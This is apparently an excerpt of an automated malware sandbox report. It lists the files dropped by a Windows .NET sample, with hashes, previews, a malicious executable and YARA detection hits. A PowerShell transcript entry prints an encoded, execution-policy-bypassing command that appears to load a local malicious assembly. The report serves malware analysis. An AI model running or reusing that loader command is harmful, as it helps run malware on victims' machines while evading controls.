                                                                                                                                                                    Entropy (8bit):5.227218785948522
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:IE5O53SFHIwi63TeaNWg1f5Vd15D55q5b56y55d5U5z55SRpY:TExniTeaN31Brdy1HpCNMHY
                                                                                                                                                                    MD5:051163E64CDC703A420B3DE2DFD2AD7A
                                                                                                                                                                    SHA1:2C1A1073D285462585F1576E975A684D42FCBD29
                                                                                                                                                                    SHA-256:4E69E8649EC29AA80A5FE79EA363A431A06E48E49C68C119F27F3DF2B1DA2FA4
                                                                                                                                                                    SHA-512:2AB4B77F60162C52F27953A9F8E770E3E22867CA82429CC761A18443705D5CBA5125AC04F4A1E77A0933C50D9D775FB3CE2AB425C9C1166A883FE2F0AFB6C7C3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/image-resolution.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: "use strict";var imageResolution={imgResolution:function(){$(".thumb, .background-image").each(function(k,v){var imageRes,params,global,self,getThumnbSize;$(v),imageRes=$(".thumb, .background-image"),params={component:imageRes,resizeTimeout:250},global={window:$(window),resizeTimer:{},resize:"resize",dataAttribute:"data-image"},getThumnbSize=function(wWidth){for(var sizeMap=[{key:479,val:"479v"},{key:549,val:"549v"},{key:768,val:"768v"},{key:1024,val:"1024v"},{key:1366,val:"1366v"},{key:1920,val:"1920v"}],i=0;i<sizeMap.length;i++)if(wWidth<=sizeMap[i].key)return sizeMap[i].val;return"1366v"},(self={}).init=function(){self.initImage(),global.window.on(global.resize,function(e){clearTimeout(global.resizeTimer),global.resizeTimer=setTimeout(function(){self.initImage()},params.resizeTimeout)})},self.initImage=function(){params.component.each(function(){if($(this),$(this).hasClass("thumb")){if(""!==$(this).find("img").length){var globalAttr=$(this).find("img").attr(global.dataAttribute);if(
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\js[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):88446
                                                                                                                                                                    Entropy (8bit):5.499406721285165
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:ohpMXbOlh0E+HGD+/HRE6cszpZvKZQf8PrmO+01W9nKPJZfdsFlGIAL5xKD26s:ohpMruh0g+5ssPf8Pl+hzAjss
                                                                                                                                                                    MD5:B5D853B0FAF805D5D8B8797869CB70E2
                                                                                                                                                                    SHA1:021A6880760BBF6AB739F92DA1D5C4774783A9DC
                                                                                                                                                                    SHA-256:725661F919AFE89C737ACFA3DDF897FBE71916532FDFE8FF9BF27B3F1264F359
                                                                                                                                                                    SHA-512:B8567D9EB03008F37A11E27BCA9219FC2E10A18CB15D546FAF2CD79E99AFC9FFA446BF74B75FA3E9206BA73A9ABBE291B17AEE720826E49A2E7B100E5F39EE0F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.google-analytics.com/gtm/js?id=GTM-P9P822R&t=gtm4&cid=134970160.1617289481
                                                                                                                                                                    Preview: .// Copyright 2012 Google Inc. All rights reserved..(function(){..var data = {."resource": {. "version":"2",. . "macros":[{. "function":"__e". },{. "function":"__dee". }],. "tags":[{. "function":"__asprv",. "vtp_globalName":"google_optimize",. "tag_id":6. }],. "predicates":[{. "function":"_eq",. "arg0":["macro",0],. "arg1":["macro",1]. },{. "function":"_eq",. "arg0":["macro",0],. "arg1":"optimize.callback". }],. "rules":[. [["if",0],["add",0]],. [["if",1],["add",0]]].},."runtime":[].....};../*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa,ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ca=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):{next:ba(a)}},da="function"==typeof Object.create?Object.create:function(a){var b=function(){};b.prototype=a;return new b},ea;.if("fu
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\language-selector.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):150
                                                                                                                                                                    Entropy (8bit):4.9940404581795566
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:TMQvLi6YMtFjKHIuRgQyBdd1XIC9HNKOCHPMLTEGAjOlG0/Yp8ktyIQuLL:A19yFGpnadpPlNKtH0LTEGAb5K5IQm
                                                                                                                                                                    MD5:D8CE6216FAD1B0598F9A8414847C3CF7
                                                                                                                                                                    SHA1:42540660D2C94184847FB21D91D4A962BC3C9153
                                                                                                                                                                    SHA-256:B98DB0B6820942BD68749A028A66D52157A27062968ED8791615A95C3E885210
                                                                                                                                                                    SHA-512:3156C08CCC64698F48799213F38AD030D5B23061305BA34AA88F8690219BC9BE3A70E3FEC36E9AF61BF098CE7DBC37F4869DB89EE65F508E6FC58C11CBEE7A77
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Frontend-Assembly/Telerik.Sitefinity.Frontend.Navigation/Mvc/Scripts/LanguageSelector/language-selector.min.js?package=WHO&v=MTMuMS43NDI5LjA%3d
                                                                                                                                                                    Preview: function openLink(o){var e=document.querySelector('[data-sf-role="'+o+'"]').value;window.location=e}.//# sourceMappingURL=language-selector.min.js.map
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\match-height.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3649
                                                                                                                                                                    Entropy (8bit):4.883208063188246
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:XQSj1yPQeVmFtLBeUdpcv5YOmHKUzl97xa0:g81aQeStLBdTcv5EHKUzj7xR
                                                                                                                                                                    MD5:109FF86BB1B43FB016103CC071EEB832
                                                                                                                                                                    SHA1:9A698F1BAC8C8609B22CD43C0B5674F6DAC072C3
                                                                                                                                                                    SHA-256:2389E480FCF94996A9755B92963D2E5F9A3AF2ECB0C27FFDA7B1D8BD0CAFE935
                                                                                                                                                                    SHA-512:2A6C8FA1C9DF7004DCDA06D2D94D26FF1C99BA7D535B20FBBA6D1BE820F13D6A6FF4DA604062A7B41CD9EEB5549D42C8FA3D72E40621C1CB1F0EADAD8AB989F6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/match-height.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: .!function (t) { var e = -1, a = -1, o = function (t) { return parseFloat(t) || 0 }, n = function (e) { var a = null, n = []; return t(e).each(function () { var e = t(this), i = e.offset().top - o(e.css("margin-top")), r = n.length > 0 ? n[n.length - 1] : null; null === r ? n.push(e) : Math.floor(Math.abs(a - i)) <= 1 ? n[n.length - 1] = r.add(e) : n.push(e), a = i }), n }, i = function (e) { var a = { byRow: !0, property: "height", target: null, remove: !1 }; return "object" == typeof e ? t.extend(a, e) : ("boolean" == typeof e ? a.byRow = e : "remove" === e && (a.remove = !0), a) }, r = t.fn.matchHeight = function (e) { var a = i(e); if (a.remove) { var o = this; return this.css(a.property, ""), t.each(r._groups, function (t, e) { e.elements = e.elements.not(o) }), this } return this.length <= 1 && !a.target ? this : (r._groups.push({ elements: this, options: a }), r._apply(this, a), this) }; r.version = "master", r._groups = [], r._throttle = 80, r._maintainScroll = !1, r._beforeU
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\publications-hero-image-thumb[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x441, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):38392
                                                                                                                                                                    Entropy (8bit):7.951700578169718
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:l/TLn9QGkGl1I+UmZ0D4llKp0F1uNjNzId6G4sWfqPKsXJjXhnI8vxX:hTL91T64jKp21mmd6pfFsBhnI8JX
                                                                                                                                                                    MD5:1C9296DCD7A3E3822924710F5F96EF16
                                                                                                                                                                    SHA1:CCD25B51EE6E9A4403C9261D26BFBFCCCCB03290
                                                                                                                                                                    SHA-256:1B0FA6BBC554CBE1F0B0130648B481B27295BBF755EE26D4D3DAA2BCAFE1E1EE
                                                                                                                                                                    SHA-512:335AF37D6108E741B6EE52055727412840765F696A9975C9D35AC8CB92B43D3C6FD8A9210DB68721943DDBFB5EBCEFA6909731385197B785E77DC166EC9C6118
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/publications/publications-hero-image-thumb.tmb-768v.jpg?sfvrsn=8174ac48_1
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"...............................................................................G......................................................................................................................54...........................................I...#.......9....C..:.-C.r..S0i...................p.g'.z..wM8gr8gr8gr8gqS.w#.w#.w#.w#.w#.w#..r8gsCA s.i.M.gEn....|4........7......a....KVM.i....................5..|...L..W-V./a.fO.1k...^.:.....x....x....x....x..5....).+}...yY.<.s..z....|._..O./..J...@.................k..9?3..;N.I=........r9.D....Z@.q..(#.....&MF.S.*=......KG....ee.(#Oj..2e#9.....E&;..Dw...t............|<.;%.V....................C\.W.y..#q....B..<..NG...c..gr8.n...W..n!.....Q...x...G......zk&9.Mjy.PG=.V.:oF.....h[.o..r.O.Y.2.r...J...@.................g...O3..Z..be.w......v>......Y..w.z
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\responsive-background-image.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):517
                                                                                                                                                                    Entropy (8bit):4.923514288470868
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:1ZA81QYAGdMfHeGX3GHTVgVQGQoAJgNYGBhExG0sxC5SweXS:1Zn1Q4Mf+GX3ayQpguZG1xC5SweXS
                                                                                                                                                                    MD5:CA549D40B7866A9C6FB4F49E58A091F3
                                                                                                                                                                    SHA1:67E8DE2030EB6B9065AF58A1493B56E800E8AE76
                                                                                                                                                                    SHA-256:B043D6283BE5CD264DB0040CE974B2256014D969C224B0730E004E5D0847BEDB
                                                                                                                                                                    SHA-512:651DAA3DC665955002BF234B3C5496192ECFF6FB22FABBE1BFACE7265F931781195016545577D1607A99EDBD0C28CDDF02BE58D2214B35BB5DC22A297A2657F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Mvc/Scripts/HeroImage/responsive-background-image.min.js?package=WHO
                                                                                                                                                                    Preview: "use strict";!function(){for(var responsiveBackgroundImage=function(element){var img=element.querySelector("img");img.addEventListener("load",function(){update(img,"",element)}),img.complete&&update(img,"",element)},update=function(img,src,element){var newSrc=void 0!==img.currentSrc?img.currentSrc:img.src;src!==newSrc&&(src=newSrc,element.style.backgroundImage='url("'+src+'")')},elements=document.querySelectorAll(".responsive-background-image"),i=0;i<elements.length;i++)responsiveBackgroundImage(elements[i])}();
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\slicknav.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):8420
                                                                                                                                                                    Entropy (8bit):5.177988984394695
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:e6B5ftaVYApggJKmapO684YBtzcmJycbeKkiKk4rB0KGtZYqxq3FWMrutqGcVtVm:rBt6YAUmW8PFMeRQR1Un1q3Ikuty7dW
                                                                                                                                                                    MD5:745444B5CE44F38EB1E80DBF902ABB83
                                                                                                                                                                    SHA1:922B44F66DFAC9814F931118C3323FE30E27BB1B
                                                                                                                                                                    SHA-256:1FD1E7C1F102C491FCBCBE53ECA8601DF80663B293B8EF8D8683B9DA0D3587E1
                                                                                                                                                                    SHA-512:9D79989A8B351B0C994283836E5711AA344067AF51A175855506456C72AB22D85F7E4C5A4F78FBC12C7C7865B13BA269E47D0ED94E93A783456E493162F13D08
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/scripts/lib/slicknav.min.js?v=12.1.7126.28741
                                                                                                                                                                    Preview: /*!.. * SlickNav Responsive Mobile Menu v1.0.10.. * (c) 2016 Josh Cope.. * licensed under MIT.. */..!function(e,t,n){function a(t,n){this.element=t,this.settings=e.extend({},i,n),this.settings.duplicate||n.hasOwnProperty("removeIds")||(this.settings.removeIds=!1),this._defaults=i,this._name=s,this.init()}var i={label:"MENU",duplicate:!0,duration:200,easingOpen:"swing",easingClose:"swing",closedSymbol:"&#9658;",openedSymbol:"&#9660;",prependTo:"body",appendTo:"",parentTag:"a",closeOnClick:!1,allowParentLinks:!1,nestedParentLinks:!0,showChildren:!1,removeIds:!0,removeClasses:!1,removeStyles:!1,brand:"",animations:"jquery",init:function(){},beforeOpen:function(){},beforeClose:function(){},afterOpen:function(){},afterClose:function(){}},s="slicknav",o="slicknav",l={DOWN:40,ENTER:13,ESCAPE:27,LEFT:37,RIGHT:39,SPACE:32,TAB:9,UP:38};a.prototype.init=function(){var n,a,i=this,s=e(this.element),r=this.settings;if(r.duplicate?i.mobileNav=s.clone():i.mobileNav=s,r.removeIds&&(i.mobileNav.removeAt
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):18817
                                                                                                                                                                    Entropy (8bit):5.001217266823362
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:ufib4GGVoGIpN6KQkj2Akjh4iUxGzCdaOdB/NXp5CvOjJEYoV4fib41:uIGV3IpNBQkj25h4iUxGzCdaOdB/NZwY
                                                                                                                                                                    MD5:DB93B232EFF0785FDDC28A0D5DAE38D2
                                                                                                                                                                    SHA1:AF5AFE47557C49F165F66B2B63962D9EB28E3157
                                                                                                                                                                    SHA-256:92939214003421B64153B215D15F89595673C709110FC6E005FF955F6684C390
                                                                                                                                                                    SHA-512:5D161CFEE2631553AC2FA8EE407FE4CBA23C9A666BB69049C0FCCBEE99413983C678E4779426532FB4F5E622155C9EFF8DA57CD93AE4453D57301B32C19CBAA9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1576
                                                                                                                                                                    Entropy (8bit):5.411651944516252
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:q8rB4nqRL/HEekfe9t4CvpBfuWpm8V8w6qRK:7rqnObHbkevpBfuWpEQK
                                                                                                                                                                    MD5:A2EF076C5ADD10C00105AC8BCA3B7C70
                                                                                                                                                                    SHA1:F37BB56A14BABDC8D445AE09E3FFCE2EE396CF86
                                                                                                                                                                    SHA-256:8EE59A2F9C7179512FFFE322D083DB58F52CB3B9DBF0B6EE97BCEF82625F2CA1
                                                                                                                                                                    SHA-512:D69269BEE2C5A7451E8B7CC961E115D28A38A048C6716A75CE07EE211FA907DEF7BE0E9CBCA5D2474B412598CE9D693C1AB8D51C9E21AFD582D5C82C0F7ADA7C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: @...e................................................@..........0..............@.....?.@.....J.C........docview.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..8................'....L..}............System.Numerics.4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD...............
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dqyvpjs.mb5.psm1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: 1
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnfqvlmt.og0.ps1
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: 1
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFC094D247FA2B2273.TMP
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):56980
                                                                                                                                                                    Entropy (8bit):1.5510816207891007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:kBqoxKE8s/U4iI1uuhW2f2PzE7Xu+h5u+hjkf2Pzv7Xu+h5u+hj:Clf4o7XPnPVkf4r7XPnPV
                                                                                                                                                                    MD5:A222F46D8821643127FD3E91D6AC16C4
                                                                                                                                                                    SHA1:B13750D20D2523DC3A724859F462B10CD1D44667
                                                                                                                                                                    SHA-256:F31A8DE6A7104C9FF07D0212081B29CD34AC40D0F3F332FE70BA5DCCEF93E0BD
                                                                                                                                                                    SHA-512:2C852FDB2B9FBF75B58A821190515692C1A16021149778C8B22A4FB98B8A879AB1131AA0452A4A6B8D784B826E8A2203EE249335D46E3F4FE127A25EE3527FFC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFE20E719C21EBC887.TMP
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13077
                                                                                                                                                                    Entropy (8bit):0.5045233227469824
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9loIF9low9lWKkySi3e:kBqoIb9KkySge
                                                                                                                                                                    MD5:5F103EC8F17FC5E6014268BCC84B7C91
                                                                                                                                                                    SHA1:6DF8B80A554516CC1E9B3FF6E68954F5FA6E053A
                                                                                                                                                                    SHA-256:4724D19AFC4E4CA0E45C1222DDAA3B07C2441029E14B3DA57EE162B0E353C812
                                                                                                                                                                    SHA-512:C9D0BB6CDA3B571BC6A4B5D616E679E802D3F84314F2D384C93817644A451A8A9A06E9213BFF33E02689312F34965982E93EBB897CC6C6939C88383CC7F755A0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFE90822A1FC75C3D3.TMP
                                                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):25441
                                                                                                                                                                    Entropy (8bit):0.27918767598683664
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laA:kBqoxxJhHWSVSEab
                                                                                                                                                                    MD5:AB889A32AB9ACD33E816C2422337C69A
                                                                                                                                                                    SHA1:1190C6B34DED2D295827C2A88310D10A8B90B59B
                                                                                                                                                                    SHA-256:4D6EC54B8D244E63B0F04FBE2B97402A3DF722560AD12F218665BA440F4CEFDA
                                                                                                                                                                    SHA-512:BD250855747BB4CEC61814D0E44F810156D390E3E9F120A12935EFDF80ACA33C4777AD66257CCA4E4003FEF0741692894980B9298F01C4CDD2D8A9C7BB522FB6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Roaming\buyonegetone.exe
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):274944
                                                                                                                                                                    Entropy (8bit):6.321651525899225
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:jFbIM6WOmdLKer5Jfiitm/Nge3vXjBZ9jSg2xq0REgPXRi+RoY46eLzkKvqpuEgU:jFQxmd7frtm/S+v9jj+RY8ohdL4JMU
                                                                                                                                                                    MD5:3087BC614A52D038FC9F62DE3DD2C61F
                                                                                                                                                                    SHA1:DA730B6FBA5A8C6F70347FF6778B089B7774EBE3
                                                                                                                                                                    SHA-256:590E6B67EE4745A4B5E2DBC85021C05360AF8401EDE1B1C5770CD3F50DEB8D41
                                                                                                                                                                    SHA-512:A0E1335023E9C951E697CC28446FC017BB8E3C79FDA70FD8F2BB8BCEF26F3EB6FB7896C207153816D1B5EEA3EE8D303442143ED2BF943FD55C49BED554412AB1
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../hB./hB./hB.DkC./hB.DlC./hB.DmC /hB.[mC./hB.[lC./hB.[kC./hB.DiC./hB./iB./hB_[`C./hB_[kC./hB_[.B./hB./.B./hB_[jC./hBRich./hB........PE..d....>b`..........".................P~.........@..........................................`.....................................................<............@...#......................8...........................@...8............................................text............................... ..`.rdata...8.......:..................@..@.data....:..........................@....pdata...#...@...$..................@..@_RDATA.......p.......$..............@..@.rsrc................&..............@..@.reloc...............(..............@..B................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2820
                                                                                                                                                                    Entropy (8bit):5.480665872859646
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:BZSvh/oO9WhIJsT+rfEhMDvCzh6SQF6BHkmvpZ21QpiqDYB1Z3nTEMEK+FmuJMqD:BZuh/N1Js+rfwOrSQ8amvpZ21lqDo1ZK
                                                                                                                                                                    MD5:F8DF3C63A054D4FEFA6A976A528ABC31
                                                                                                                                                                    SHA1:100548147866D5C91E5B26BF708115356CD7B7A0
                                                                                                                                                                    SHA-256:276F997207286163549A198F5E8A463152496686DFDF0044E46B086260E1FDD0
                                                                                                                                                                    SHA-512:B0E8D947BA8D455D72BEE0A71072747A67C38374FD59D309A082F5351DCCD9C8535D7E646ED22E2AF2C3A24CC6A4C1AA7877B76F72F50F4E13324C0F6A74123F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, Author: Florian Roth
                                                                                                                                                                    • Rule: JoeSecurity_PowershellLoadEncryptedAssembly, Description: Yara detected Powershell Load Encrypted Assembly, Source: C:\Users\user\Documents\20210401\PowerShell_transcript.131521.mteVmlsc.20210401080426.txt, Author: Joe Security
                                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210401080426..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 131521 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\system32\windowspowershell\v1.0\powershell.exe -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0AD

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):2.855782258459279
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
